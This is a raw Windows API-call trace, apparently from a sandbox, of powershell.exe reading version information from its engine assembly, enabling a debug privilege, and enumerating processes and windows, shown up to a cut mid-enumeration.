	[0382.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.822] GetVersionExW (in: lpVersionInformation=0x20da50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20da50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0382.823] SetErrorMode (uMode=0x1) returned 0x1
	[0382.824] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20dbb0 | out: lpFileInformation=0x20dbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0382.824] SetErrorMode (uMode=0x1) returned 0x1
	[0383.199] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20de20 | out: lpdwHandle=0x20de20) returned 0x94c
	[0383.201] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2db72d8 | out: lpData=0x2db72d8) returned 1
	[0383.203] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dd98, puLen=0x20dd90 | out: lplpBuffer=0x20dd98*=0x2db7374, puLen=0x20dd90) returned 1
	[0383.205] lstrlenW (lpString="䅁") returned 1
	[0383.214] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db7450, puLen=0x20dd00) returned 1
	[0383.215] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0383.217] CoTaskMemAlloc (cb=0x2e) returned 0x3090a0
	[0383.218] lstrcpyW (in: lpString1=0x3090a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0383.219] CoTaskMemFree (pv=0x3090a0) 
	[0383.219] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db74a4, puLen=0x20dd00) returned 1
	[0383.219] lstrlenW (lpString="System.Management.Automation") returned 28
	[0383.219] CoTaskMemAlloc (cb=0x3c) returned 0x2d9860
	[0383.219] lstrcpyW (in: lpString1=0x2d9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0383.219] CoTaskMemFree (pv=0x2d9860) 
	[0383.219] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db7500, puLen=0x20dd00) returned 1
	[0383.219] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0383.219] CoTaskMemAlloc (cb=0x20) returned 0x3a76a0
	[0383.219] lstrcpyW (in: lpString1=0x3a76a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0383.219] CoTaskMemFree (pv=0x3a76a0) 
	[0383.219] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db7540, puLen=0x20dd00) returned 1
	[0383.219] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0383.219] CoTaskMemAlloc (cb=0x44) returned 0x2d9860
	[0383.219] lstrcpyW (in: lpString1=0x2d9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0383.219] CoTaskMemFree (pv=0x2d9860) 
	[0383.219] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db75a8, puLen=0x20dd00) returned 1
	[0383.219] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0383.219] CoTaskMemAlloc (cb=0x76) returned 0x344ad0
	[0383.219] lstrcpyW (in: lpString1=0x344ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0383.219] CoTaskMemFree (pv=0x344ad0) 
	[0383.219] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db7644, puLen=0x20dd00) returned 1
	[0383.219] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0383.219] CoTaskMemAlloc (cb=0x44) returned 0x2d9860
	[0383.219] lstrcpyW (in: lpString1=0x2d9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0383.219] CoTaskMemFree (pv=0x2d9860) 
	[0383.219] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db76a8, puLen=0x20dd00) returned 1
	[0383.220] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0383.220] CoTaskMemAlloc (cb=0x58) returned 0x2f51e0
	[0383.220] lstrcpyW (in: lpString1=0x2f51e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0383.220] CoTaskMemFree (pv=0x2f51e0) 
	[0383.220] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db7724, puLen=0x20dd00) returned 1
	[0383.220] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0383.220] CoTaskMemAlloc (cb=0x20) returned 0x3a76a0
	[0383.220] lstrcpyW (in: lpString1=0x3a76a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0383.220] CoTaskMemFree (pv=0x3a76a0) 
	[0383.220] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2db73cc, puLen=0x20dd00) returned 1
	[0383.220] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0383.220] CoTaskMemAlloc (cb=0x66) returned 0x30b990
	[0383.220] lstrcpyW (in: lpString1=0x30b990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0383.220] CoTaskMemFree (pv=0x30b990) 
	[0383.220] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x0, puLen=0x20dd00) returned 0
	[0383.220] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x0, puLen=0x20dd00) returned 0
	[0383.220] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x0, puLen=0x20dd00) returned 0
	[0383.220] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dcd8, puLen=0x20dcd0 | out: lplpBuffer=0x20dcd8*=0x2db7374, puLen=0x20dcd0) returned 1
	[0383.221] CoTaskMemAlloc (cb=0x204) returned 0x33c970
	[0383.221] VerLanguageNameW (in: wLang=0x0, szLang=0x33c970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0383.222] CoTaskMemFree (pv=0x33c970) 
	[0383.223] VerQueryValueW (in: pBlock=0x2db72d8, lpSubBlock="\\", lplpBuffer=0x20dd28, puLen=0x20dd20 | out: lplpBuffer=0x20dd28*=0x2db7300, puLen=0x20dd20) returned 1
	[0383.228] GetCurrentProcessId () returned 0x998
	[0383.683] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x20cc50 | out: lpLuid=0x20cc50*(LowPart=0x14, HighPart=0)) returned 1
	[0383.685] GetCurrentProcess () returned 0xffffffffffffffff
	[0383.686] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x20cc70 | out: TokenHandle=0x20cc70*=0x2e4) returned 1
	[0383.687] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2dbab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0383.688] CloseHandle (hObject=0x2e4) returned 1
	[0383.692] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x2e4
	[0383.701] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2dbabb8, cb=0x200, lpcbNeeded=0x20dc88 | out: lphModule=0x2dbabb8, lpcbNeeded=0x20dc88) returned 1
	[0383.703] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2dbae28, cb=0x18 | out: lpmodinfo=0x2dbae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0383.704] CoTaskMemAlloc (cb=0x804) returned 0x3af8e0
	[0383.704] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x3af8e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0383.704] CoTaskMemFree (pv=0x3af8e0) 
	[0383.705] CoTaskMemAlloc (cb=0x804) returned 0x3af8e0
	[0383.705] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x3af8e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0383.705] CoTaskMemFree (pv=0x3af8e0) 
	[0383.706] CloseHandle (hObject=0x2e4) returned 1
	[0383.714] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x998) returned 0x2e4
	[0383.715] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x20ddb8 | out: lpExitCode=0x20ddb8*=0x103) returned 1
	[0384.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dbb088, Length=0x20000, ResultLength=0x20dd80 | out: SystemInformation=0x12dbb088, ResultLength=0x20dd80*=0x21198) returned 0xc0000004
	[0384.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ddb0b8, Length=0x23998, ResultLength=0x20dd80 | out: SystemInformation=0x12ddb0b8, ResultLength=0x20dd80*=0x21198) returned 0x0
	[0384.219] EnumWindows (lpEnumFunc=0x24166ac, lParam=0x0) returned 1
	[0385.019] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0385.760] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x558
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x538
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x778
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x778
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.402] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x460
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1270
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1298
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x120c
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x122c
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x11c4
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x11b0
	[0386.403] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1188
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1148
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1160
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x10fc
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe34
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xea4
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x514
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe48
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xbc8
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xdf8
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x318
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xcac
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x8bc
	[0386.404] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf9c
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf48
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe40
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xecc
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xeb8
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe80
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe98
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe60
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xee4
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf00
	[0386.405] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xdf0
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe1c
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xdd0
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xd94
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xd74
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xd00
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xcd8
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc84
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xca4
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc64
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc24
	[0386.406] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb84
	[0386.407] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xbac
	[0386.407] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x384
	[0386.407] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xab8
	[0386.407] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x33c
	[0386.407] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa44
	[0386.408] GetWindow (hWnd=0x102d0, uCmd=0x4) returned 0x0
	[0386.408] IsWindowVisible (hWnd=0x102d0) returned 0
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa64
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x8a8
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xaf0
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x88c
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb04
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x910
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x230
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xac0
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xab4
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xaac
	[0386.409] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x3d0
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x978
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa7c
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x59c
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa88
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa6c
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa68
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x9f8
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa04
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x924
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x8dc
	[0386.410] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x7dc
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x768
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x764
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x820
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x810
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x794
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x83c
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x7ac
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb44
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb5c
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x838
	[0386.411] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x818
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x5b8
	[0386.412] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x494
